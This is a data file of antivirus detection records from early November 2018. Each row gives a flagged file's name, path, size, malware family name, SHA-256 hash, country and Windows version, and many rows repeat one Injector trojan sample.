  Row(detection=Row(filename='avscan-20181102-213148-1c139e47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_33b67271\\AVSCAN-20181102-213057-15A0E064\\AVSCAN-20181102-213148-1C139E47', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055803-3b31f2ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055803-3B31F2EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jahiiswg.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\jahiiswG.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152012-306d8c3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152012-306D8C3A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:23:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000007a1', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp000007a1', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sdclt.exe', filepath='\\\\?\\C:\\Windows\\system32\\sdclt.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='6b461547f598597c980d879d65573c0f21993087a4f2d893211864b8317fd694', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052915-350fa000', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052915-350FA000', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051012-8be2f1ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051012-8BE2F1ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060522-40c9c89b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060522-40C9C89B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055009-20e4bc6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055009-20E4BC6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053056-71b8d50b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053056-71B8D50B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061735-f5a7ae58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061735-F5A7AE58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050952-804496c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050952-804496C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051811-a9ab0f8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051811-A9AB0F8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052750-02ac14b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052750-02AC14B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055328-97444782', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055328-97444782', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054538-7f1a11ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054538-7F1A11CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062041-648935e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062041-648935E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055519-d948c157', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055519-D948C157', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053526-12bb356a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053526-12BB356A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061805-079742d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061805-079742D9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060559-56cbb33d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060559-56CBB33D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051651-7a217714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051651-7A217714', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055314-8f18074f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055314-8F18074F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053616-301a7afc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053616-301A7AFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054009-bb53c191', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054009-BB53C191', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055324-952cb318', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055324-952CB318', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053539-1a14208f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053539-1A14208F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060852-bdee827c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060852-BDEE827C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051637-71612cfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051637-71612CFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gyrating.vir', filepath='C:\\Program Files\\Plotless\\gyrating.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='854a44b5d6807b06b6495e1641305bbdaef2ff103ffadfb6b9dc30f0f9b63363', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611360, timestamp='2018-11-02T01:36:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054405-47ba52b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054405-47BA52B0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060926-d22c3a3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060926-D22C3A3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062239-aabdcffc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062239-AABDCFFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062132-8305064b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062132-8305064B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051718-89d9f72b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051718-89D9F72B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053317-c5ba9359', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053317-C5BA9359', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054840-ebd1ccf4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054840-EBD1CCF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060633-6b0b8670', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060633-6B0B8670', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055143-58a4b88a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055143-58A4B88A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051204-cec64445', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051204-CEC64445', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nero v5.5.0 serial numbers.exe', filepath='f:\\deskstar 120\\pefips filez\\diverses\\diverse programme\\_ripsoft\\cracks - serials\\generatoren\\Nero V5.5.0 Serial Numbers.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='82534b2c39418d99d962f0d5254bc471ba49cc82b293ffbed6843117b3032c98', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:26:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052403-7b93d2e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052403-7B93D2E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='install_flash_player_ppapi.exe', filepath='E:\\برامج\\Player 22.0.0.209\\install_flash_player_ppapi.exe', filesize=20536000, name='W32/Sality.AT.#M1.#R1'), hash='83570f9828c70856753f10c1dd4d0f57ea4691091039051be1d3509273885dc5', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=33088, timestamp='2018-11-02T13:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062155-90ccdda7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062155-90CCDDA7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060903-c4e327f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060903-C4E327F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060951-e15db8b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060951-E15DB8B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054140-f1772448', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054140-F1772448', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060627-67e3f8b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060627-67E3F8B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055843-532e3fe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055843-532E3FE0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054142-f269caf4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054142-F269CAF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062433-eec4e484', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062433-EEC4E484', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054312-285773f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054312-285773F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155104-8fe2345f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155104-8FE2345F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:05Z'), dt=datetime.date(2018, 11, 1)),
